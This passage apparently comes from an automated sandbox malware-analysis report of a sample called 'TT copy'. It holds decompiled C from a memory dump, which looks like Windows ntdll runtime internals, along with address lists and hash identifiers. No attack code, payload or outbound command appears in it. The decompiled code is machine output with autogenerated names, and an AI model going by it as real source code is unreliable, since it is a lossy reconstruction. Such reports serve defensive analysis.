                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe9
                                                                                                            0x0109fbf2
                                                                                                            0x00000000
                                                                                                            0x0109fbf2
                                                                                                            0x0109fbde
                                                                                                            0x0109fbcb
                                                                                                            0x0109fbab
                                                                                                            0x0109fc8b
                                                                                                            0x0109fc8b
                                                                                                            0x0109fc8c
                                                                                                            0x0109fb80
                                                                                                            0x0109fb72
                                                                                                            0x0109fb5e
                                                                                                            0x0109fc8d
                                                                                                            0x0109fc91
                                                                                                            0x0109fadf
                                                                                                            0x0109fadf
                                                                                                            0x0109fae1
                                                                                                            0x0109fae4
                                                                                                            0x0109fae7
                                                                                                            0x0109faec
                                                                                                            0x0109faf8
                                                                                                            0x0109fb00
                                                                                                            0x0109fb07
                                                                                                            0x0109fb0f
                                                                                                            0x0109fb0f
                                                                                                            0x0109fb07
                                                                                                            0x00000000
                                                                                                            0x0109faf8
                                                                                                            0x0109fadd

                                                                                                            Strings
                                                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 010DBE0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                            • API String ID: 0-865735534
                                                                                                            • Opcode ID: f24d31902a5ae37d4be1a0d1a29ad0ed4de10322ed676dd16f31c89ba6f83f4f
                                                                                                            • Instruction ID: 41557699471d399608ac63f1dd6cf7bdcb2a90e6e111e96d3a2b6b225112896e
                                                                                                            • Opcode Fuzzy Hash: f24d31902a5ae37d4be1a0d1a29ad0ed4de10322ed676dd16f31c89ba6f83f4f
                                                                                                            • Instruction Fuzzy Hash: 51A11471B0074B8BEB65DF68C4607BEBBE5AF49710F0585A9E992CB680DB30D8419B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01062D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E01062D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1155350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1157bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E010A97C0();
				}
				if( *0x11579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01091624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01087D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E010FFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E010A9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0109E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L010BDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1156901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1156901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E010A9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E010A95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01087D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01087D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E010E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E010FFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1155350;
							if(_t109 != 0x1155350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E010FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E010F5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                            0x01062d8a
                                                                                                            0x01062d8a
                                                                                                            0x01062d92
                                                                                                            0x01062d96
                                                                                                            0x01062d9e
                                                                                                            0x01062da0
                                                                                                            0x01062da3
                                                                                                            0x01062da5
                                                                                                            0x01062da8
                                                                                                            0x01062dab
                                                                                                            0x01062db2
                                                                                                            0x010bf9aa
                                                                                                            0x010bf9ab
                                                                                                            0x010bf9ae
                                                                                                            0x010bf9ae
                                                                                                            0x01062db8
                                                                                                            0x01062dc2
                                                                                                            0x010bf9b9
                                                                                                            0x010bf9be
                                                                                                            0x010bf9bf
                                                                                                            0x010bf9bf
                                                                                                            0x01062dcf
                                                                                                            0x010bf9c9
                                                                                                            0x01062dd5
                                                                                                            0x01062dd5
                                                                                                            0x01062dd5
                                                                                                            0x01062dde
                                                                                                            0x01062de1
                                                                                                            0x01062e70
                                                                                                            0x01062e72
                                                                                                            0x01062e72
                                                                                                            0x01062de7
                                                                                                            0x01062deb
                                                                                                            0x01062e7c
                                                                                                            0x01062e83
                                                                                                            0x01062e85
                                                                                                            0x01062e8b
                                                                                                            0x01062e8d
                                                                                                            0x01062e92
                                                                                                            0x01062e92
                                                                                                            0x01062e85
                                                                                                            0x01062df1
                                                                                                            0x01062df7
                                                                                                            0x01062df9
                                                                                                            0x01062df9
                                                                                                            0x01062dfc
                                                                                                            0x01062dff
                                                                                                            0x01062e02
                                                                                                            0x00000000
                                                                                                            0x01062e05
                                                                                                            0x01062e0c
                                                                                                            0x010bf9d9
                                                                                                            0x01062e12
                                                                                                            0x01062e12
                                                                                                            0x01062e12
                                                                                                            0x01062e1a
                                                                                                            0x010bf9e3
                                                                                                            0x010bf9e9
                                                                                                            0x010bf9f0
                                                                                                            0x010bf9f6
                                                                                                            0x010bf9f8
                                                                                                            0x010bf9f8
                                                                                                            0x010bf9f0
                                                                                                            0x01062e23
                                                                                                            0x010bfa02
                                                                                                            0x010bfa03
                                                                                                            0x010bfa05
                                                                                                            0x010bfa06
                                                                                                            0x00000000
                                                                                                            0x01062e29
                                                                                                            0x01062e29
                                                                                                            0x01062e2e
                                                                                                            0x01062e34
                                                                                                            0x01062e3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01062e44
                                                                                                            0x01062e47
                                                                                                            0x01062e4d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01062e4f
                                                                                                            0x01062e54
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01062e5a
                                                                                                            0x01062e5f
                                                                                                            0x01062e9a
                                                                                                            0x01062ea4
                                                                                                            0x01062ea5
                                                                                                            0x01062ea8
                                                                                                            0x01062eaf
                                                                                                            0x01062eb2
                                                                                                            0x01062eb5
                                                                                                            0x010bfae9
                                                                                                            0x010bfaeb
                                                                                                            0x010bfaed
                                                                                                            0x010bfaef
                                                                                                            0x010bfaf7
                                                                                                            0x010bfaf8
                                                                                                            0x010bfafd
                                                                                                            0x010bfaff
                                                                                                            0x010bfb04
                                                                                                            0x010bfb04
                                                                                                            0x010bfaff
                                                                                                            0x01062ec0
                                                                                                            0x01062ec4
                                                                                                            0x01062ec6
                                                                                                            0x01062ec8
                                                                                                            0x010bfb14
                                                                                                            0x010bfb18
                                                                                                            0x010bfb1e
                                                                                                            0x010bfb21
                                                                                                            0x010bfb21
                                                                                                            0x01062ece
                                                                                                            0x01062ece
                                                                                                            0x01062ece
                                                                                                            0x01062ed7
                                                                                                            0x01062e61
                                                                                                            0x01062e63
                                                                                                            0x010bfa6b
                                                                                                            0x010bfa71
                                                                                                            0x010bfa76
                                                                                                            0x010bfa78
                                                                                                            0x010bfa8a
                                                                                                            0x010bfa7a
                                                                                                            0x010bfa83
                                                                                                            0x010bfa83
                                                                                                            0x010bfa8f
                                                                                                            0x010bfa91
                                                                                                            0x010bfa97
                                                                                                            0x010bfa9d
                                                                                                            0x010bfaa4
                                                                                                            0x010bfaaa
                                                                                                            0x010bfaaf
                                                                                                            0x010bfab1
                                                                                                            0x010bfac3
                                                                                                            0x010bfab3
                                                                                                            0x010bfabc
                                                                                                            0x010bfabc
                                                                                                            0x010bfac8
                                                                                                            0x010bfacb
                                                                                                            0x010bfadf
                                                                                                            0x010bfadf
                                                                                                            0x010bfacb
                                                                                                            0x010bfaa4
                                                                                                            0x010bfa91
                                                                                                            0x01062e6f
                                                                                                            0x01062e6f
                                                                                                            0x01062e5f
                                                                                                            0x010bfa13
                                                                                                            0x010bfa15
                                                                                                            0x010bfa17
                                                                                                            0x010bfa1f
                                                                                                            0x010bfa21
                                                                                                            0x010bfa22
                                                                                                            0x010bfa25
                                                                                                            0x010bfa28
                                                                                                            0x010bfa2f
                                                                                                            0x010bfa2f
                                                                                                            0x010bfa2a
                                                                                                            0x010bfa2a
                                                                                                            0x010bfa2a
                                                                                                            0x010bfa31
                                                                                                            0x010bfa34
                                                                                                            0x010bfa36
                                                                                                            0x010bfa3c
                                                                                                            0x010bfa3e
                                                                                                            0x010bfa41
                                                                                                            0x010bfa43
                                                                                                            0x010bfa45
                                                                                                            0x010bfa45
                                                                                                            0x010bfa41
                                                                                                            0x010bfa3c
                                                                                                            0x010bfa4a
                                                                                                            0x010bfa4f
                                                                                                            0x010bfa51
                                                                                                            0x010bfa53
                                                                                                            0x010bfa56
                                                                                                            0x010bfa5b
                                                                                                            0x010bfa5e
                                                                                                            0x00000000
                                                                                                            0x010bfa5e
                                                                                                            0x01062e23

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RTL: Re-Waiting
                                                                                                            • API String ID: 0-316354757
                                                                                                            • Opcode ID: 79950419a14a1ea8718c13f20f54570a35183327f0f6fc7e85dcddf4f242077d
                                                                                                            • Instruction ID: b767d15035504bcc459a435270e6237623f4ac9abdadbcadbcba9ac3fee33726
                                                                                                            • Opcode Fuzzy Hash: 79950419a14a1ea8718c13f20f54570a35183327f0f6fc7e85dcddf4f242077d
                                                                                                            • Instruction Fuzzy Hash: DC612471A00606DFDB26EF6CCC80BBEBBE9EB44714F1442A9D9D1A72C1C7349940C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01130EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E01130EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0112FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01131074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E010A9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0112A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0112A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1158b04 >> 0x14) + (_v44 -  *0x1158b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01087D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0112138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01087D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0111FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1158724 & 0x00000008) != 0) {
						E011252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011315B5(0x1158ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                            0x01130eb7
                                                                                                            0x01130eb9
                                                                                                            0x01130ec0
                                                                                                            0x01130ec2
                                                                                                            0x01130ecd
                                                                                                            0x0113105b
                                                                                                            0x0113105b
                                                                                                            0x01131061
                                                                                                            0x01131066
                                                                                                            0x01131066
                                                                                                            0x0113106b
                                                                                                            0x01131073
                                                                                                            0x01131073
                                                                                                            0x01130ed3
                                                                                                            0x01130ed6
                                                                                                            0x01130edc
                                                                                                            0x01130ee0
                                                                                                            0x01130ee7
                                                                                                            0x01130ef0
                                                                                                            0x01130ef5
                                                                                                            0x01130efa
                                                                                                            0x01130efc
                                                                                                            0x01130efd
                                                                                                            0x01130f03
                                                                                                            0x01130f04
                                                                                                            0x01130f06
                                                                                                            0x01130f07
                                                                                                            0x01130f09
                                                                                                            0x01130f0e
                                                                                                            0x01130f14
                                                                                                            0x01130f23
                                                                                                            0x01130f2d
                                                                                                            0x01130f34
                                                                                                            0x01130f34
                                                                                                            0x01130f14
                                                                                                            0x01130f52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01130f58
                                                                                                            0x01130f73
                                                                                                            0x01130f74
                                                                                                            0x01130f79
                                                                                                            0x01130f7d
                                                                                                            0x01130f80
                                                                                                            0x01130f86
                                                                                                            0x01130fab
                                                                                                            0x01130fb5
                                                                                                            0x01130fc6
                                                                                                            0x01130fd1
                                                                                                            0x01130fe3
                                                                                                            0x01130fd3
                                                                                                            0x01130fdc
                                                                                                            0x01130fdc
                                                                                                            0x01130feb
                                                                                                            0x01131009
                                                                                                            0x01131009
                                                                                                            0x01131015
                                                                                                            0x01131027
                                                                                                            0x01131017
                                                                                                            0x01131020
                                                                                                            0x01131020
                                                                                                            0x0113102f
                                                                                                            0x0113103c
                                                                                                            0x0113103c
                                                                                                            0x01131048
                                                                                                            0x01131050
                                                                                                            0x01131050
                                                                                                            0x01131055
                                                                                                            0x00000000
                                                                                                            0x01131055
                                                                                                            0x01130f88
                                                                                                            0x01130f9e
                                                                                                            0x01130fa2
                                                                                                            0x01130fa9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01130fa9
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `
                                                                                                            • API String ID: 0-2679148245
                                                                                                            • Opcode ID: 703ab67a5296e5d42c0b9aa19d2fc1fc675e848e34e587417454339d584ed16f
                                                                                                            • Instruction ID: d27d49896c51df561732373f20d4253f17e1b8c126b545e02b90e7fa6b42bd88
                                                                                                            • Opcode Fuzzy Hash: 703ab67a5296e5d42c0b9aa19d2fc1fc675e848e34e587417454339d584ed16f
                                                                                                            • Instruction Fuzzy Hash: AA51A3713083429FD329DF28D984B5BBBE9EBC4714F14092CF99697294D771E805CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E0109F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01084120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E010A9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E010A9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E010A95D0();
							goto L11;
						} else {
							_t109 = L01084620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E010AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E010A95D0();
										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                            0x0109f0d3
                                                                                                            0x0109f0d9
                                                                                                            0x0109f0e0
                                                                                                            0x0109f0e7
                                                                                                            0x0109f0f2
                                                                                                            0x0109f0f4
                                                                                                            0x0109f0f8
                                                                                                            0x0109f100
                                                                                                            0x0109f108
                                                                                                            0x0109f10d
                                                                                                            0x0109f115
                                                                                                            0x0109f116
                                                                                                            0x0109f11f
                                                                                                            0x0109f123
                                                                                                            0x0109f124
                                                                                                            0x0109f12c
                                                                                                            0x0109f130
                                                                                                            0x0109f134
                                                                                                            0x0109f13d
                                                                                                            0x0109f144
                                                                                                            0x0109f14b
                                                                                                            0x0109f152
                                                                                                            0x010dbab0
                                                                                                            0x010dbab0
                                                                                                            0x0109f158
                                                                                                            0x0109f158
                                                                                                            0x0109f15a
                                                                                                            0x0109f160
                                                                                                            0x0109f165
                                                                                                            0x0109f166
                                                                                                            0x0109f16f
                                                                                                            0x0109f173
                                                                                                            0x010dbaa7
                                                                                                            0x010dbaa7
                                                                                                            0x010dbaab
                                                                                                            0x00000000
                                                                                                            0x0109f179
                                                                                                            0x0109f18d
                                                                                                            0x0109f191
                                                                                                            0x010dbaa2
                                                                                                            0x00000000
                                                                                                            0x0109f197
                                                                                                            0x0109f19b
                                                                                                            0x0109f1a2
                                                                                                            0x0109f1a9
                                                                                                            0x0109f1af
                                                                                                            0x0109f1b2
                                                                                                            0x0109f1b6
                                                                                                            0x0109f1b9
                                                                                                            0x0109f1c4
                                                                                                            0x0109f1d8
                                                                                                            0x0109f1df
                                                                                                            0x0109f1e3
                                                                                                            0x0109f1eb
                                                                                                            0x0109f1ee
                                                                                                            0x0109f1f4
                                                                                                            0x0109f20f
                                                                                                            0x010dbab7
                                                                                                            0x010dbabb
                                                                                                            0x010dbacc
                                                                                                            0x010dbad1
                                                                                                            0x0109f215
                                                                                                            0x0109f218
                                                                                                            0x0109f226
                                                                                                            0x0109f22b
                                                                                                            0x00000000
                                                                                                            0x0109f22b
                                                                                                            0x0109f1f6
                                                                                                            0x0109f1f6
                                                                                                            0x0109f1f9
                                                                                                            0x0109f1fb
                                                                                                            0x0109f1fb
                                                                                                            0x0109f1f4
                                                                                                            0x0109f191
                                                                                                            0x0109f173
                                                                                                            0x0109f152
                                                                                                            0x0109f203

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                            • Instruction ID: 58f28938df67229c75e49668843089368115f450965a86a7a0551dadcf451daa
                                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                            • Instruction Fuzzy Hash: BC517A71604712AFC320DF69C840A6BBBF8FF48714F00892EFA9587690E7B4E914CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E010E3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x115d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E010A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E010E3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E010AFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E010E3540;
						E010AFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E010BDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E010F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E010A97C0();
					}
					return E010AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E010E3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E010E3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E010AFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E010A9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E010E3787(_a4,  &_v352, _t80);
						}
					}
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E010A95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                            0x010e3552
                                                                                                            0x010e355a
                                                                                                            0x010e355d
                                                                                                            0x010e3566
                                                                                                            0x010e3567
